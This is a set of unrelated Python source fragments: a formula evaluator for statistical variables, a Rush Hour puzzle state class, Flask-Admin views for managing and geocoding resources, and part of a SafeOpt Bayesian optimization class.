res[Formula.__name_data(v_left, operator, v_right)][i] = 0
elif operator == '>=':
if var_left.values[v_left][i] >= var_right.values[v_right][i]:
res[Formula.__name_data(v_left, operator, v_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, v_right)][i] = 0
elif is_numeric_str(var_right):
for v_left in var_left.values:
if operator == '+':
res[Formula.__name_data(v_left, operator, var_right)][i] = var_left.values[v_left][i] + float(var_right)
elif operator == '-':
res[Formula.__name_data(v_left, operator, var_right)][i] = var_left.values[v_left][i] - float(var_right)
elif operator == '*':
res[Formula.__name_data(v_left, operator, var_right)][i] = var_left.values[v_left][i] * float(var_right)
elif operator == '/':
if float(var_right) != 0:
res[Formula.__name_data(v_left, operator, var_right)][i] = var_left.values[v_left][i] / float(var_right)
else:
res[Formula.__name_data(v_left, operator, var_right)][i] = np.nan
elif operator == '^':
res[Formula.__name_data(v_left, operator, var_right)][i] = var_left.values[v_left][i] ** float(var_right)
elif np.isnan(var_left.values[v_left][i]):
res[Formula.__name_data(v_left, operator, var_right)][i] = np.nan
elif operator == '=':
if var_left.values[v_left][i] == float(var_right):
res[Formula.__name_data(
v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(
v_left, operator, var_right)][i] = 0
elif operator == '!=':
if var_left.values[v_left][i] != float(var_right):
res[Formula.__name_data(
v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(
v_left, operator, var_right)][i] = 0
elif operator == '<':
if var_left.values[v_left][i] < float(var_right):
res[Formula.__name_data(
v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(
v_left, operator, var_right)][i] = 0
elif operator == '>':
if var_left.values[v_left][i] > float(var_right):
res[Formula.__name_data(
v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(
v_left, operator, var_right)][i] = 0
elif operator == '<=':
if var_left.values[v_left][i] <= float(var_right):
res[Formula.__name_data(
v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(
v_left, operator, var_right)][i] = 0
elif operator == '>=':
if var_left.values[v_left][i] >= float(var_right):
res[Formula.__name_data(
v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(
v_left, operator, var_right)][i] = 0
else:
if var_right in data.variables(): # var_right == a variable in sample
variable_right = Variable.from_data(data, var_right)
if variable_right.type == Variable_Types.categorical:
vals_right = variable_right.values(Sample(data))[:-1] if skip_collinear else variable_right.values(Sample(data))
for v_left in var_left.values:
for val_right in vals_right:
if not is_numeric(data.values[var_right][i]):
if data.values[var_right][i] == val_right:
if operator == '+':
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
var_left.values[v_left][i] + 1
elif operator == '-':
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
var_left.values[v_left][i] - 1
elif operator in ['*', '/', '^']:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
var_left.values[v_left][i]
elif np.isnan(var_left.values[v_left][i]):
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = np.nan
elif operator == '=':
if var_left.values[v_left][i] == 1:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
elif operator == '!=':
if var_left.values[v_left][i] != 1:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
elif operator == '<':
if var_left.values[v_left][i] < 1:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
elif operator == '>':
if var_left.values[v_left][i] > 1:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
elif operator == '<=':
if var_left.values[v_left][i] <= 1:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
elif operator == '>=':
if var_left.values[v_left][i] >= 1:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
else:
if operator in ['+', '-']:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
var_left.values[v_left][i]
elif operator == '*':
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = 0
elif operator == '/':
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
np.nan
elif operator == '^':
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = 1
elif operator == '=':
if var_left.values[v_left][i] == 0:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
elif operator == '!=':
if var_left.values[v_left][i] != 0:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
elif operator == '<':
if var_left.values[v_left][i] < 0:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
elif operator == '>':
if var_left.values[v_left][i] > 0:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
elif operator == '<=':
if var_left.values[v_left][i] <= 0:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
elif operator == '>=':
if var_left.values[v_left][i] >= 0:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
1
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
0
else:
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = np.nan
elif variable_right.type == Variable_Types.numeric:
for v_left in var_left.variables():
if operator == '+':
res[Formula.__name_data(v_left, operator, var_right)][i] = \
var_left.values[v_left][i] + \
data.values[var_right][i]
elif operator == '-':
res[Formula.__name_data(v_left, operator, var_right)][i] = \
var_left.values[v_left][i] - \
data.values[var_right][i]
elif operator == '*':
res[Formula.__name_data(v_left, operator, var_right)][i] = \
var_left.values[v_left][i] * \
data.values[var_right][i]
elif operator == '/':
if data.values[var_right][i] != 0:
res[Formula.__name_data(v_left, operator, var_right)][i] = \
var_left.values[v_left][i] / \
data.values[var_right][i]
else:
res[Formula.__name_data(v_left, operator, var_right)][i] = np.nan
elif operator == '^':
res[Formula.__name_data(v_left, operator, var_right)][i] = \
var_left.values[v_left][i] ** \
data.values[var_right][i]
elif np.isnan(var_left.values[v_left][i]) or np.isnan(data.values[var_right][i]):
res[Formula.__name_data(v_left, operator, var_right)][i] = np.nan
elif operator == '=':
if var_left.values[v_left][i] == data.values[var_right][i]:
res[Formula.__name_data(v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, var_right)][i] = 0
elif operator == '!=':
if var_left.values[v_left][i] != data.values[var_right][i]:
res[Formula.__name_data(v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, var_right)][i] = 0
elif operator == '<':
if var_left.values[v_left][i] < data.values[var_right][i]:
res[Formula.__name_data(v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, var_right)][i] = 0
elif operator == '>':
if var_left.values[v_left][i] > data.values[var_right][i]:
res[Formula.__name_data(v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, var_right)][i] = 0
elif operator == '<=':
if var_left.values[v_left][i] <= data.values[var_right][i]:
res[Formula.__name_data(v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, var_right)][i] = 0
elif operator == '>=':
if var_left.values[v_left][i] >= data.values[var_right][i]:
res[Formula.__name_data(v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, var_right)][i] | |
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 23 01:22:56 2019
@author: CHaithcock
"""
import numpy as np
import svgwrite
import RHConstants
class RHState():
def __init__(self,board,red_car_end_a):
"""
Input (Option 1):
board: ndArray of dypte int and size 36
red_car_end_a: left most position of red car must
must be between 12 and 16 inclusive
Input (option 2):
board: integeger representing the hash of the board
red_car_end_a: left most position of red car must
must be between 12 and 16 inclusive
"""
#!!!!TODO - consider adding validation of board
if isinstance(board,np.ndarray):
if board.size == 36:
if board.dtype == int:
self._board = np.copy(board.reshape(6,6))
else:
raise Exception("RH Board numpy ndarray must have dtype int")
else:
raise Exception("Numpy array for board must consist of 36 elements")
elif isinstance(board,int):
self._board = self._int_to_board(board)
else:
raise TypeError('Board Must be an Integer or an ndArray')
if not (12 <= red_car_end_a <= 16):
raise ValueError("Red Car End A must be between 12 and 16 inclusive",red_car_end_a)
else:
self._red_car_end_a = red_car_end_a
self._pieces = None
self._init_svg()
self._svg_pieces = None
def __eq__(self,other):
if not isinstance(other, RHState):
return NotImplemented
if self._board_as_int()== other._board_as_int():
if self._red_car_end_a == other._red_car_end_a:
return True
return False
def __lt__(self,other):
if not isinstance(other, RHState):
return NotImplemented
if self._board_as_int < other.board_as_int:
return True
if self._board_as_int > other.board_as_int:
return False
# if _board_as_int is same in both instances,
# compoare red_car_end_a
if self._red_car_end_a < other.red_car_end_a:
return True
return False
def __hash__(self):
return hash ( (self._board_as_int(),self._red_car_end_a) )
# ####################################################
#
# Data Routines
#
# Input/Output/Data Conversion
#
#
# #####################################################
def _board_as_bitstrings(self):
vec_bin_repr = np.vectorize(lambda x: np.binary_repr(x,width=3))
t = vec_bin_repr(self._board)
return t
def _board_as_int(self):
vec_bin_repr = np.vectorize(lambda x: np.binary_repr(x,width=3))
t = vec_bin_repr(self._board)
return int(''.join(np.apply_along_axis(lambda x: ''.join(x), 1,t)),2)
def _int_to_board(self,i):
#i = '154444257952488798331863040'
s = bin(int(i))[2:].zfill(108)
v = np.array([int(s[i:i+3],2) for i in range(0,len(s),3)],dtype=int)
return v.reshape((6,6))
def board(self):
return self._board
def _red_car_cols(self):
red_car_a_col = self._red_car_end_a % 6
return ( (red_car_a_col, red_car_a_col + 1 ) )
def as_array(self):
return( (self._board,self._red_car_end_a) )
pass
def as_int(self):
return ( (self._board_as_int,self._red_car_end_a) )
pass
    def get_board_as2ints(self):
        # Unimplemented stub.  The commented-out line suggests it was meant
        # to return the (board encoding, red_car_end_a) pair -- note it
        # would also need to CALL _board_as_int() rather than return the
        # bound method.  TODO confirm intent before implementing.
        #return ( (self._board_as_int,self._red_car_end_a) )
        pass
    def _vehicles_by_order(self):
        # Unimplemented placeholder -- no visible callers in this file.
        pass
def _get_pieces(self):
if self._pieces is not None:
return self._pieces
discovered = np.array([False]*36).reshape(6,6)
self._pieces = []
for row in range(6):
for col in range(6):
if not discovered[row,col] and self._board[row,col] != RHConstants.BLANK_SPACE:
piece = {}
piece['orientation'] = self._board[row,col]
piece['end_a_row'] = row
piece['end_a_col'] = col
discovered[row,col] = True
if self._board[row,col] == RHConstants.VERTICAL_CAR:
discovered[row:row+2,col] = True
elif self._board[row,col] == RHConstants.VERTICAL_TRUCK:
discovered[row:row+3,col] = True
elif self._board[row,col] == RHConstants.HORIZONTAL_CAR:
discovered[row,col:col+2] = True
elif self._board[row,col] == RHConstants.HORIZONTAL_TRUCK:
discovered[row,col:col+3] = True
self._pieces.append(piece)
return self._pieces
def _vehicles_by_type(self):
''' Create a list of indices capturing where vertical cars are
return dict of vehicles:
vcars: [ [ [x1,y1], [x2,y2] ] , ..., [ [xn,yn] , [xn',yn'] ] ]
vtrucks: [ [ [x1,y1],[x2,y2],[x3,y3] ] ... ]
hcars:
htrucks:
Will walk through self._board and track:
current location in board
current
'''
discovered = np.array([False] * 36).reshape(6,6)
ret = {'vcars':[], 'hcars':[], 'vtrucks':[],'htrucks':[]}
# discover verticals by column major order
# !!!! TODO - create a dictionary each car/truck
# each entry in ret is a list of dictionaries
'''
each inner dict keys (svg_rect_args:
a_row
a_col
color
symbol
? change loop order to loop through columns then move to next row:
for r in range(6):
for c in range(6)
if self.board[r,c] == RHConstants.VERTICAL_CAR:
'''
for c in range(6):
for r in range(6):
if self._board[r,c] == RHConstants.VERTICAL_CAR:
if discovered[r,c] == False:
ret['vcars'].append([[r,c],[r+1,c]])
discovered[r:r+2,c] = True
if self._board[r,c] == RHConstants.VERTICAL_TRUCK:
if discovered[r,c] == False:
ret['vtrucks'].append([[r,c],[r+1,c],[r+2,c]])
discovered[r:r+3,c] = True
for r in range(6):
for c in range(6):
if self._board[r,c] == RHConstants.HORIZONTAL_CAR:
if discovered[r,c] == False:
ret['hcars'].append( [[r,c],[r,c+1]])
discovered[r,c:c+2] = True
if self._board[r,c] == RHConstants.HORIZONTAL_TRUCK:
if discovered[r,c] == False:
ret['htrucks'].append([[r,c],[r,c+1],[r,c+2]])
discovered[r,c:c+3] = True
return(ret)
# ####################################################
#
# Game PLay Routines
#
# #####################################################
    def isSolnState(self):
        """Return True when this state is solved, i.e. the red car's end-a position is 16."""
        return self._red_car_end_a == 16
    #!!!!TODO - add error handling for bad inputs
    def neighbor(self, end_a, direction):
        """
        Build the neighboring state reached by moving the piece whose end-a
        occupies flat position `end_a` one step in `direction`
        ('up', 'down', 'left' or 'right').

        NOTE(review): this method looks unfinished and appears broken as
        written -- confirm before relying on it:
          * `self.board` is a method, so `np.copy(self.board)` and the
            `self.board[end_a]` subscripts below would fail at runtime;
            presumably `self._board` (flattened to 1-D, given the +6/+12
            offsets) was intended.
          * `red_car_end_a` is only assigned on some branches, so the final
            RHState(...) call can raise UnboundLocalError.
          * `self.red_car_end_a` does not exist; the attribute is
            `self._red_car_end_a`.
          * the 'down' truck branch writes VERTICAL_CAR where VERTICAL_TRUCK
            seems intended, and the 'right' truck branch writes
            VERTICAL_TRUCK at end_a+2 where HORIZONTAL_TRUCK at end_a+3
            seems intended.
        The vectorized neighbors_up/down/left/right methods below appear to
        be the working replacements.
        """
        nbr_board = np.copy(self.board)
        # !!!! Data Validation
        if direction == 'up':
            nbr_board[end_a-6] = self.board[end_a]
            if self.board[end_a] == RHConstants.VERTICAL_CAR:
                nbr_board[end_a + 6] = RHConstants.BLANK_SPACE
            else:
                nbr_board[end_a+12] = RHConstants.BLANK_SPACE
        elif direction == 'down':
            nbr_board[end_a] = RHConstants.BLANK_SPACE
            if self.board[end_a] == RHConstants.VERTICAL_CAR:
                nbr_board[end_a+12] = RHConstants.VERTICAL_CAR
            else:
                nbr_board[end_a+18] = RHConstants.VERTICAL_CAR
        elif direction == 'left':
            nbr_board[end_a-1] = self.board[end_a]
            if self.board[end_a] == RHConstants.HORIZONTAL_CAR:
                nbr_board[end_a+1] = RHConstants.BLANK_SPACE
                if self._red_car_end_a == end_a:
                    red_car_end_a = self.red_car_end_a - 1
            else:
                nbr_board[end_a+2] = RHConstants.BLANK_SPACE
        elif direction == 'right':
            nbr_board[end_a] = RHConstants.BLANK_SPACE
            if self.board[end_a] == RHConstants.HORIZONTAL_CAR:
                nbr_board[end_a+2] = RHConstants.HORIZONTAL_CAR
                if self._red_car_end_a == end_a:
                    red_car_end_a = self.red_car_end_a + 1
            else:
                nbr_board[end_a + 2] = RHConstants.VERTICAL_TRUCK
        return RHState(nbr_board,red_car_end_a)
def neighbors_all(self):
d = self.neighbors_down()
u = self.neighbors_up()
l = self.neighbors_left()
r = self.neighbors_right()
return d.union(u).union(l).union(r)
def neighbors_up(self):
ret = set()
mv_x = -self._board + np.roll(self._board,-1,0)
#set bottom most column to zeros. Only want matches against legit up moves
mv_x[5,:] = 0
mv_car = np.where(mv_x==RHConstants.VERTICAL_CAR)
mv_truck = np.where(mv_x ==RHConstants.VERTICAL_TRUCK)
mv_up_car = list(zip(mv_car[0],mv_car[1]))
mv_up_truck = list(zip(mv_truck[0], mv_truck[1]))
for x,y in mv_up_car:
nbr_board = np.copy(self._board)
nbr_board[x,y] = RHConstants.VERTICAL_CAR
nbr_board[x+2,y] = RHConstants.BLANK_SPACE
ret.add( RHState(nbr_board,self._red_car_end_a ) )
for x,y in mv_up_truck:
nbr_board = np.copy(self._board)
nbr_board[x,y] = RHConstants.VERTICAL_TRUCK
nbr_board[x+3,y] = RHConstants.BLANK_SPACE
ret.add( RHState(nbr_board,self._red_car_end_a) )
return(ret)
def neighbors_down(self):
ret = set()
mv_x = -self._board + np.roll(self._board,1,0)
#set bottom most column to zeros. Only want matches against legit up moves
mv_x[0,:] = 0
mv_car = np.where(mv_x==RHConstants.VERTICAL_CAR)
mv_truck = np.where(mv_x ==RHConstants.VERTICAL_TRUCK)
mv_up_car = list(zip(mv_car[0],mv_car[1]))
mv_up_truck = list(zip(mv_truck[0], mv_truck[1]))
for x,y in mv_up_car:
nbr_board = np.copy(self._board)
nbr_board[x,y] = RHConstants.VERTICAL_CAR
nbr_board[x-2,y] = RHConstants.BLANK_SPACE
ret.add( RHState(nbr_board,self._red_car_end_a ) )
for x,y in mv_up_truck:
nbr_board = np.copy(self._board)
nbr_board[x,y] = RHConstants.VERTICAL_TRUCK
nbr_board[x-3,y] = RHConstants.BLANK_SPACE
ret.add( RHState(nbr_board,self._red_car_end_a) )
return(ret)
def neighbors_left(self):
ret = set()
mv_x = -self._board + np.roll(self._board,-1,1)
# set right most column to all zeros to eliminate non-legit left move matches.
mv_x[:,5] = 0
#mv_x = mv_x[:,:5]
mv_car = np.where(mv_x==RHConstants.HORIZONTAL_CAR)
mv_truck = np.where(mv_x ==RHConstants.HORIZONTAL_TRUCK)
mv_left_car = list(zip(mv_car[0],mv_car[1]))
mv_left_truck = list(zip(mv_truck[0], mv_truck[1]))
for x,y in mv_left_car:
nbr_board = np.copy(self._board)
nbr_board[x,y] = RHConstants.HORIZONTAL_CAR
nbr_board[x,y+2] = RHConstants.BLANK_SPACE
# Test if red car is moving left
# Note, y+1, y+2 must be a horizontal car
# so, either y+1 and y+2 are the red cols or
# neither is a a red col
# if have moved the red car, then y is on the left side of the car
# and red_car_end_a = y
if x == 2 and y+1 in self._red_car_cols():
red_car_end_a = self._red_car_end_a - 1
else:
red_car_end_a = self._red_car_end_a
ret.add( RHState(nbr_board,red_car_end_a ) )
for x,y in mv_left_truck:
nbr_board = np.copy(self._board)
nbr_board[x,y] = RHConstants.HORIZONTAL_TRUCK
nbr_board[x,y+3] = RHConstants.BLANK_SPACE
ret.add( RHState(nbr_board,self._red_car_end_a) )
return(ret)
def neighbors_right(self):
"""
Create a list of all neighbor states to self that are reached by
moving a car or truck right.
Depends on Constants being properly spaced per notes in constants file.
Uses Numpy Roll to effectively move all pieces to the right one place
and then evaluates which results to determine wihch moves were
legitimate per Rush Hour puzzle rules.
"""
ret = set()
mv_x = -self._board + np.roll(self._board,1,1)
#set left most column to zeros. Only want matches against legit right moves
mv_x[:,0] = 0
mv_car = np.where(mv_x==RHConstants.HORIZONTAL_CAR)
mv_truck = np.where(mv_x ==RHConstants.HORIZONTAL_TRUCK)
mv_right_car = list(zip(mv_car[0],mv_car[1]))
mv_right_truck = list(zip(mv_truck[0], mv_truck[1]))
for x,y in mv_right_car:
nbr_board = np.copy(self._board)
nbr_board[x,y] = RHConstants.HORIZONTAL_CAR
nbr_board[x,y-2] = RHConstants.BLANK_SPACE
# Test if red car is moving left
# Note, y+1, y+2 must be a horizontal car
# | |
"""
resourceview.py
Contains administrative views for working with resources.
"""
from datetime import date
from admin_helpers import *
from sqlalchemy import or_, not_, func
from flask import current_app, redirect, flash, request, url_for
from flask.ext.admin import BaseView, expose
from flask.ext.admin.actions import action
from flask.ext.admin.contrib.sqla import ModelView
from wtforms import DecimalField, validators
import geopy
from geopy.exc import *
from remedy.rad.models import Resource, Category
from remedy.rad.geocoder import Geocoder
class ResourceView(AdminAuthMixin, ModelView):
    """
    An administrative view for working with resources.
    """
    # Columns shown in the list view.
    column_list = ('name', 'organization',
                   'address', 'url',
                   'source', 'last_updated')
    column_default_sort = 'name'
    # Free-text search and filterable fields.
    column_searchable_list = ('name', 'description', 'organization', 'notes',)
    column_filters = ('visible', 'source', 'npi', 'date_verified',)
    # These fields are maintained automatically or via dedicated views.
    form_excluded_columns = ('date_created', 'last_updated',
                             'category_text', 'reviews')
    create_template = 'admin/resource_create.html'
    edit_template = 'admin/resource_edit.html'
    column_labels = dict(npi='NPI', url='URL')
    column_descriptions = dict(
        npi='The National Provider Identifier (NPI) of the resource.',
        hours='The hours of operation for the resource.',
        source='The source of the resource\'s information.',
        notes='Administrative notes for the resource, not visible to end users.',
        date_verified='The date the resource was last verified by an administrator.')

    def scaffold_form(self):
        """
        Scaffolds the creation/editing form so that the latitude
        and longitude fields are optional, but can still be set
        by the Google Places API integration.
        """
        form_cls = super(ResourceView, self).scaffold_form()
        # Latitude/longitude are usually filled in by geocoding, so an
        # administrator editing the form may leave them blank.
        form_cls.latitude = DecimalField(validators=[validators.Optional()])
        form_cls.longitude = DecimalField(validators=[validators.Optional()])
        return form_cls

    @action('togglevisible',
            'Toggle Visibility',
            'Are you sure you wish to toggle visibility for the selected resources?')
    def action_togglevisible(self, ids):
        """
        Attempts to toggle visibility for each of the specified resources.

        Args:
            ids: The list of resource IDs, indicating which resources
                should have their visibility toggled.
        """
        # Load every resource matching the selected IDs.
        selected = self.get_query().filter(self.model.id.in_(ids)).all()
        messages = []
        if not selected:
            messages.append('No resources were selected.')
        else:
            for resource in selected:
                # Identifier used in all status messages.
                resource_str = 'resource #' + str(resource.id) + ' (' + resource.name + ')'
                try:
                    resource.visible = not resource.visible
                    visible_status = ' as visible' if resource.visible else ' as not visible'
                except Exception as ex:
                    messages.append('Error changing ' + resource_str + ': ' + str(ex))
                else:
                    messages.append('Marked ' + resource_str + visible_status + '.')
            # Persist the whole batch in a single commit.
            self.session.commit()
        # Surface every per-resource result to the admin user.
        flash("\n".join(messages))

    @action('markverified',
            'Mark Verified',
            'Are you sure you wish to mark the selected resources as verified?')
    def action_markverified(self, ids):
        """
        Attempts to mark each of the specified resources as verified
        on the current date.

        Args:
            ids: The list of resource IDs, indicating which resources
                should be marked as verified.
        """
        # Load every resource matching the selected IDs.
        selected = self.get_query().filter(self.model.id.in_(ids)).all()
        messages = []
        if not selected:
            messages.append('No resources were selected.')
        else:
            for resource in selected:
                resource_str = 'resource #' + str(resource.id) + ' (' + resource.name + ')'
                try:
                    resource.date_verified = date.today()
                except Exception as ex:
                    messages.append('Error changing ' + resource_str + ': ' + str(ex))
                else:
                    messages.append('Marked ' + resource_str + ' as verified.')
            # Persist the whole batch in a single commit.
            self.session.commit()
        flash("\n".join(messages))

    @action('assigncategories', 'Assign Categories')
    def action_assigncategories(self, ids):
        """
        Sets up a redirection action for mass-assigning categories
        to the specified resources.

        Args:
            ids: The list of resource IDs that should be updated.
        """
        # Hand the selection off to the dedicated category-assignment view.
        return redirect(url_for('resourcecategoryassignview.index', ids=ids))

    def __init__(self, session, **kwargs):
        super(ResourceView, self).__init__(Resource, session, **kwargs)
class ResourceRequiringGeocodingView(ResourceView):
"""
An administrative view for working with resources that need geocoding.
"""
column_list = ('name', 'organization', 'address', 'source')
# Disable model creation/deletion
can_create = False
can_delete = False
def get_query(self):
"""
Returns the query for the model type.
Returns:
The query for the model type.
"""
query = self.session.query(self.model)
return self.prepare_geocode_query(query)
def get_count_query(self):
"""
Returns the count query for the model type.
Returns:
The count query for the model type.
"""
query = self.session.query(func.count('*')).select_from(self.model)
return self.prepare_geocode_query(query)
def prepare_geocode_query(self, query):
"""
Prepares the provided query by ensuring that
all relevant geocoding-related filters have been applied.
Args:
query: The query to update.
Returns:
The updated query.
"""
# Ensure an address is defined
query = query.filter(self.model.address != None)
query = query.filter(self.model.address != '')
# Ensure at least one geocoding field is missing
query = query.filter(or_(self.model.latitude == None,
self.model.longitude == None))
return query
@action('geocode',
'Geocode')
def action_geocode(self, ids):
"""
Attempts to geocode each of the specified resources.
Args:
ids: The list of resource IDs, indicating which resources
should be geocoded.
"""
# Load all resources by the set of IDs
target_resources = self.get_query().filter(self.model.id.in_(ids)).all()
# Build a list of all the results
results = []
if len(target_resources) > 0:
# Set up the geocoder, and then try to geocode each resource
geocoder = Geocoder(api_key=current_app.config.get('MAPS_SERVER_KEY'))
for resource in target_resources:
# Build a helpful message string to use for errors.
resource_str = 'resource #' + str(resource.id) + ' (' + resource.name + ')'
try:
geocoder.geocode(resource)
except geopy.exc.GeopyError as gpex:
# Handle Geopy errors separately
exc_type = ''
# Attempt to infer some extra information based on the exception type
if isinstance(gpex, geopy.exc.GeocoderQuotaExceeded):
exc_type = 'quota exceeded'
elif isinstance(gpex, geopy.exc.GeocoderAuthenticationFailure):
exc_type = 'authentication failure'
elif isinstance(gpex, geopy.exc.GeocoderInsufficientPrivileges):
exc_type = 'insufficient privileges'
elif isinstance(gpex, geopy.exc.GeocoderUnavailable):
exc_type = 'server unavailable'
elif isinstance(gpex, geopy.exc.GeocoderTimedOut):
exc_type = 'timed out'
elif isinstance(gpex, geopy.exc.GeocoderQueryError):
exc_type = 'query error'
if len(exc_type) > 0:
exc_type = '(' + exc_type + ') '
results.append('Error geocoding ' + resource_str + ': ' + exc_type + str(gpex))
except Exception as ex:
results.append('Error geocoding ' + resource_str + ': ' + str(ex))
else:
results.append('Geocoded ' + resource_str + '.')
# Save our changes.
self.session.commit()
else:
results.append('No resources were selected.')
# Flash the results of everything
flash("\n".join(msg for msg in results))
@action('removeaddress',
'Remove Address',
'Are you sure you wish to remove address information from the selected resources?')
def action_remove_address(self, ids):
"""
Attempts to remove address information from each of the specified resources.
Args:
ids: The list of resource IDs, indicating which resources
should have address information stripped.
"""
# Load all resources by the set of IDs
target_resources = self.get_query().filter(self.model.id.in_(ids)).all()
# Build a list of all the results
results = []
if len(target_resources) > 0:
for resource in target_resources:
# Build a helpful message string to use for errors.
resource_str = 'resource #' + str(resource.id) + ' (' + resource.name + ')'
try:
resource.address = None
resource.latitude = None
resource.longitude = None
resource.location = None
except Exception as ex:
results.append('Error updating ' + resource_str + ': ' + str(ex))
else:
results.append('Removed address information from ' + resource_str + '.')
# Save our changes.
self.session.commit()
else:
results.append('No resources were selected.')
# Flash the results of everything
flash("\n".join(msg for msg in results))
    def __init__(self, session, **kwargs):
        """Initialize the view.

        Args:
            session: The database session used for all queries.
            **kwargs: Additional options forwarded to ResourceView.
        """
        # Because we're invoking the ResourceView constructor,
        # we don't need to pass in the ResourceModel.
        super(ResourceRequiringGeocodingView, self).__init__(session, **kwargs)
class ResourceRequiringCategoriesView(ResourceView):
    """
    An administrative view for working with resources that need categories.
    """
    column_list = ('name', 'organization', 'address', 'source')

    # Records may only be edited, never created or removed, from this view.
    can_create = False
    can_delete = False

    def __init__(self, session, **kwargs):
        # ResourceView already knows the model type, so only the session
        # and any extra options need to be forwarded.
        super(ResourceRequiringCategoriesView, self).__init__(session, **kwargs)

    def get_query(self):
        """
        Returns the query for the model type.

        Returns:
            The query for the model type.
        """
        return self.prepare_category_query(self.session.query(self.model))

    def get_count_query(self):
        """
        Returns the count query for the model type.

        Returns:
            The count query for the model type.
        """
        base = self.session.query(func.count('*')).select_from(self.model)
        return self.prepare_category_query(base)

    def prepare_category_query(self, query):
        """
        Prepares the provided query by ensuring that
        filtering out resources with categories has been applied.

        Args:
            query: The query to update.

        Returns:
            The updated query.
        """
        # Keep only resources that have no categories at all.
        return query.filter(not_(self.model.categories.any()))
class ResourceCategoryAssignView(AdminAuthMixin, BaseView):
"""
The view for mass-assigning resources to categories.
"""
# Not visible in the menu.
def is_visible(self):
return False
@expose('/', methods=['GET', 'POST'])
def index(self):
| |
stopping criterion for all the gps.
This ignores the scaling factor.
scaling: list of floats or "auto"
A list used to scale the GP uncertainties to compensate for
different input sizes. This should be set to the maximal variance of
each kernel. You should probably leave this to "auto" unless your
kernel is non-stationary.
Examples
--------
>>> from safeopt import SafeOpt
>>> from safeopt import linearly_spaced_combinations
>>> import GPy
>>> import numpy as np
Define a Gaussian process prior over the performance
>>> x = np.array([[0.]])
>>> y = np.array([[1.]])
>>> gp = GPy.models.GPRegression(x, y, noise_var=0.01**2)
>>> bounds = [[-1., 1.]]
>>> parameter_set = linearly_spaced_combinations([[-1., 1.]],
... num_samples=100)
Initialize the Bayesian optimization and get new parameters to evaluate
>>> opt = SafeOpt(gp, parameter_set, fmin=[0.])
>>> next_parameters = opt.optimize()
Add a new data point with the parameters and the performance to the GP. The
performance has normally be determined through an external function call.
>>> performance = np.array([[1.]])
>>> opt.add_new_data_point(next_parameters, performance)
"""
def __init__(self, gp, parameter_set, fmin, beta_dict, lipschitz=None,
num_contexts=0, threshold=0, scaling='auto'):
"""Initialization, see `SafeOpt`."""
# Overwrite beta init
if beta_dict["style"] == "fiedler" or beta_dict["style"] == "fiedler-lipschitz":
print("Fiedler-bounds used!")
B = beta_dict["B"]
R = beta_dict["R"]
delta = beta_dict["delta"]
lamb = beta_dict["lambda"]
beta = lambda t: B + \
R * math.sqrt(math.log(np.linalg.det(self.gp.kern.K(self.data[0], self.data[0])
+ lamb * np.identity(len(self.data[0]))))
- 2 * math.log(delta))
elif beta_dict["style"] == "chowdhury":
print("Chowdhury-bounds used!")
B = beta_dict["B"]
R = beta_dict["R"]
delta = beta_dict["delta"]
noise_variance = beta_dict["noise_variance"]
card_D = beta_dict["card_D"]
beta = lambda t: B + R * math.sqrt(
2 * (card_D * math.log(1 + (R ** -2) * t * card_D *
np.amax(np.diag(
self.gp.kern.K(parameter_set, parameter_set)))) + 1 + math.log(
1 / delta)))
